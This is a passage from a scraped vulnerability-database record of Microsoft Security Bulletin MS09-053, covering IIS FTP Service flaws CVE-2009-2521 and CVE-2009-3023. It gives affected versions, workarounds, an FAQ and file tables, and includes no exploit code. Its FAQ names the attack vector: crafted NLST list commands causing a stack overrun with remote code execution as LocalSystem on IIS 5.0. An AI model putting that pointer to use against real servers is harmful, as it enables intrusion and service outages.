Execution\r\n\t\r\n\r\nImportant\r\nIIS 5.1 (FTP Service 5.1)\t \t \t \r\n\r\nMicrosoft Internet Information Services 5.1 on\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nIIS 6.0 (FTP Service 6.0)\t \t \t \r\n\r\nMicrosoft Internet Information Services 6.0 on\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 6.0 on\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 6.0 on\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nIIS 7.0 (FTP Service 6.0)\t \t \t \r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Server 2008 for x64-based bit Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Internet Information Services 7.0 on\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nIIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nA vulnerability exists in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, Microsoft Internet Information Services (IIS) 6.0, and Microsoft Internet Information Services (IIS) 7.0. The vulnerability could allow denial of service (DoS).\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-2521.\r\n\t\r\nMitigating Factors for IIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFTP Service is not installed by default on all supported editions of Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2003 Windows Server 2008 and Windows 7.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the FTP service\r\n\r\nDisable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet stop msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Stop.\r\n\r\nImpact of workaround. You will not be able to transfer files using the FTP service.\r\n\r\nHow to undo the workaround.\r\n\r\nRe-enable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet start msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Start.\r\n\u2022\t\r\n\r\nDeny FTP write access to anonymous users\r\n\r\nThis workaround blocks denial of service attacks from anonymous users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to cause a remote code execution with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is deselected.\r\n\r\nImpact of workaround: Anonymous users will not have the ability to publish content on the server using the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is selected.\r\n\u2022\t\r\n\r\nDeny FTP access to anonymous users\r\n\r\nThis workaround blocks denial of service attacks from unauthenticated users without a valid user account.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to exploit the vulnerability with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is deselected.\r\n\r\nImpact of Workaround: Anonymous users will not have access to the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is selected.\r\n\u2022\t\r\n\r\nModify NTFS file system permissions to disallow directory creation by FTP users\r\n\r\nThis workaround blocks denial of service attacks from authenticated users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAn administrator can modify NTFS file system permissions on the root directories of FTP sites hosted on a server to disallow creation of directories by FTP users. This modification still allows FTP users to upload files to existing directories. Authenticated and unauthenticated users will not be able to cause a remote code execution with this workaround.\r\n\r\nAs administrator, perform the following steps to remove directory creation privileges from the Users group. If you have a configured FTP user or custom group to manage your FTP users, replace the Users group in Step 5 below with these custom identities.\r\n\r\n1.\r\n\t\r\n\r\nBrowse to the root directory of your FTP site. By default this is in %systemroot%\inetpub\ftproot.\r\n\r\n2.\r\n\t\r\n\r\nRight-click the directory and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Security tab and click Advanced.\r\n\r\n4.\r\n\t\r\n\r\nClick Change Permissions.\r\n\r\n5.\r\n\t\r\n\r\nSelect the Users group and click Edit.\r\n\r\n6.\r\n\t\r\n\r\nDeselect Create Folders/Append Data.\r\n\r\nImpact of Workaround: FTP users will not be able to create directories through the FTP Service. FTP users will still be able to upload files to existing directories through the FTP Service.\r\n\u2022\t\r\n\r\nUpgrade to FTP Service 7.5\r\n\r\nFTP Service 7.5 is available for Internet Information Services 7.0. This version of FTP Service is not affected by the vulnerabilities described in this bulletin. See the following sites on Download Center:\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 (x86)\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 (x64)\r\n\r\nImpact of workaround: FTP sites will need to be migrated from FTP Service 6.0 to FTP Service 7.5.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected service to stop responding and automatically restart. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that the Microsoft FTP service in IIS handles list commands.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could a user\u2019s system to become non-responsive and restart.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could exploit this vulnerability by sending specially crafted list commands to the server.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nServer systems running Microsoft File Transfer Protocol Service (FTP).\r\n\r\nWhat does the update do? \r\nThis update modifies the way that the Microsoft FTP server handles list command operations.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2009-2521.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of limited, targeted attacks attempting to exploit the vulnerability.\r\n\r\nDoes applying this security update help protect customers from the code, published publicly, that attempts to exploit this vulnerability? \r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2009-2521.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nIIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nA Vulnerability exists in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, and Microsoft Internet Information Services (IIS) 6.0. The vulnerability could allow remote code execution (RCE) on systems running FTP Service on IIS 5.0, or denial of service (DoS) on systems running FTP Service on IIS 5.1, IIS 6.0.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-3023.\r\n\t\r\nMitigating Factors for IIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFTP Service is not installed by default on all supported editions of Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2003, Windows Server 2008 and Windows 7.\r\n\u2022\t\r\n\r\nInternet Information Services 5.1 on Window XP and Internet Information Services 6.0 on Windows Server 2003 are at reduced risk because these versions were compiled using the /GS compiler option. This does not remove the vulnerability but does make exploitation of the vulnerability more difficult and reduces the impact to a denial of service.\r\n\u2022\t\r\n\r\nInternet Information Services 7.0 is not affected by this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the FTP service\r\n\r\nDisable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet stop msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Stop.\r\n\r\nImpact of workaround. You will not be able to transfer files using the FTP service.\r\n\r\nHow to undo the workaround.\r\n\r\nRe-enable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet start msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Start.\r\n\u2022\t\r\n\r\nDeny FTP write access to anonymous users\r\n\r\nThis workaround blocks remote code execution attacks from anonymous users. With this workaround, all affected versions of IIS are still vulnerable to denial of service attacks from anonymous users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to cause a remote code execution with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is deselected.\r\n\r\nImpact of workaround: Anonymous users will not have the ability to publish content on the server using the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is selected.\r\n\u2022\t\r\n\r\nDeny FTP access to anonymous users\r\n\r\nThis workaround blocks denial of service attacks from unauthenticated users without a valid user account.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to exploit the vulnerability with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is deselected.\r\n\r\nImpact of Workaround: Anonymous users will not have access to the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is selected.\r\n\u2022\t\r\n\r\nModify NTFS file system permissions to disallow directory creation by FTP users\r\n\r\nThis workaround blocks remote code execution attacks from authenticated users. With this workaround, all affected versions of IIS server are still vulnerable to denial of service attacks from authenticated users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAn administrator can modify NTFS file system permissions on the root directories of FTP sites hosted on a server to disallow creation of directories by FTP users. This modification still allows FTP users to upload files to existing directories. Authenticated and unauthenticated users will not be able to cause a remote code execution with this workaround.\r\n\r\nAs administrator, perform the following steps to remove directory creation privileges from the Users group. If you have a configured FTP user or custom group to manage your FTP users, replace the Users group in Step 5 below with these custom identities.\r\n\r\n1.\r\n\t\r\n\r\nBrowse to the root directory of your FTP site. By default this is in %systemroot%\inetpub\ftproot.\r\n\r\n2.\r\n\t\r\n\r\nRight-click the directory and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Security tab and click Advanced.\r\n\r\n4.\r\n\t\r\n\r\nClick Change Permissions.\r\n\r\n5.\r\n\t\r\n\r\nSelect the Users group and click Edit.\r\n\r\n6.\r\n\t\r\n\r\nDeselect Create Folders/Append Data.\r\n\r\nImpact of Workaround: FTP users will not be able to create directories through the FTP Service. FTP users will still be able to upload files to existing directories through the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nBrowse to the root directory of your FTP site. By default this is in %systemroot%\inetpub\ftproot.\r\n\r\n2.\r\n\t\r\n\r\nRight-click the directory and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Security tab and click Advanced.\r\n\r\n4.\r\n\t\r\n\r\nClick Change Permissions.\r\n\r\n5.\r\n\t\r\n\r\nSelect the Users group and click Edit.\r\n\r\n6.\r\n\t\r\n\r\nSelect Create Folders/Append Data.\r\n\u2022\t\r\n\r\nUpgrade to FTP Service 7.5\r\n\r\nFTP Service 7.5 is available for Internet Information Services 7.0. This version of FTP Service is not affected by the vulnerabilities described in this bulletin. See the following sites on Download Center:\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 (x86)\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 (x64)\r\n\r\nImpact of workaround: FTP sites will need to be migrated from FTP Service 6.0 to FTP Service 7.5.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected service to stop responding and automatically restart. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nThis is a remote code execution vulnerability on systems running Microsoft Windows 2000 Service Pack 4 and a denial of service vulnerability on all of the other affected platforms. An attacker who successfully exploited this vulnerability in IIS 5.0 on Microsoft Windows 2000 Service Pack 4 could cause remote code execution in the context of LocalSystem. An attacker who successfully exploited this vulnerability on IIS 5.1 and IIS 6.0 could cause the IIS FTP service to stop and become unresponsive.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that the Microsoft FTP service in IIS handles list commands.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker with access to the FTP Service could use this vulnerability to cause a stack-based overrun that could allow execution of arbitrary code in the context of the LocalSystem account on systems running IIS 5.0, or denial of service on affected systems running IIS 5.1 or IIS 6.0. In configurations of FTP Service where anonymous authentication is allowed, the attacker need not be authenticated for exploitation to occur. For more information on the LocalSystem account, see the MSDN article, LocalSystem Account.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn anonymous or authenticated user with access to the FTP service could send FTP NLST commands causing memory corruption and remote code execution on systems running IIS 5.0 on Microsoft Windows 2000 and denial of service on systems running IIS 5.1 or IIS 6.0 on other platforms.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nServer systems running Microsoft File Transfer Protocol Service (FTP).\r\n\r\nWhat does the update do? \r\nThis update modifies the way that the Microsoft FTP server handles list command operations.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2009-3023.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of limited, targeted attacks attempting to exploit the vulnerability.\r\n\r\nDoes applying this security update help protect customers from the code, published publicly, that attempts to exploit this vulnerability? \r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2009-3023.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nKingcope for reporting the IIS FTP Service DoS Vulnerability (CVE-2009-2521)\r\n\u2022\t\r\n\r\nKingcope for reporting the IIS FTP Service RCE and DoS Vulnerability (CVE-2009-3023)\r\n\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (October 13, 2009): Bulletin published.", "edition": 1, "modified": "2009-10-13T00:00:00", "published": "2009-10-13T00:00:00", "id": "SECURITYVULNS:DOC:22610", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22610", "title": "Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:34:56", "bulletinFamily": "microsoft", "cvelist": ["CVE-2009-2521", "CVE-2009-3023"], "description": "<html><body><p>Resolves vulnerabilities in the FTP Service in Internet Information Services (IIS) 5.0, IIS 5.1, IIS 6.0, and IIS 7.0.</p><h2></h2><div class=\"kb-notice-section section\"><span class=\"text-base\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-1\" target=\"_self\">Support is ending for some versions of Windows</a></span>.</div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS09-053. To view the complete security bulletin, visit one of the following Microsoft Web sites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/200910.aspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/200910.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update Web site now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-3\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS09-053.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3>You can install the security update on a computer that is not running an affected version of FTP. When you do this, FTP is not installed on the computer. However, if the FTP service is installed on the computer in the future, Windows Update will reoffer the update, and you will have to install the update on the computer.</div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.<br/><br/><h3 class=\"sbody-h3\">Windows 2000 file information</h3><h4 class=\"sbody-h4\">For all supported editions of Microsoft Windows 2000 Service Pack 4</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">5.0.2195.7336</td><td class=\"sbody-td\">05-Sep-2009</td><td class=\"sbody-td\">19:05</td><td class=\"sbody-td\">118,544</td></tr></table></div><h3 class=\"sbody-h3\">Windows XP and Windows Server 2003 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific service branch (QFE, GDR) are noted in the \"Service branch\" column.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.</li><li>In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KB<strong class=\"sbody-strong\">number</strong>.cat) that is signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.3624</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:23</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.3624</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">06:59</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.5875</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:09</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.2600.5875</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:16</td><td class=\"sbody-td\">126,976</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:47</td><td class=\"sbody-td\">179,712</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">09:43</td><td class=\"sbody-td\">179,712</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">6.0.3790.4584</td><td class=\"sbody-td\">06-Sep-2009</td><td class=\"sbody-td\">07:46</td><td class=\"sbody-td\">128,512</td><td 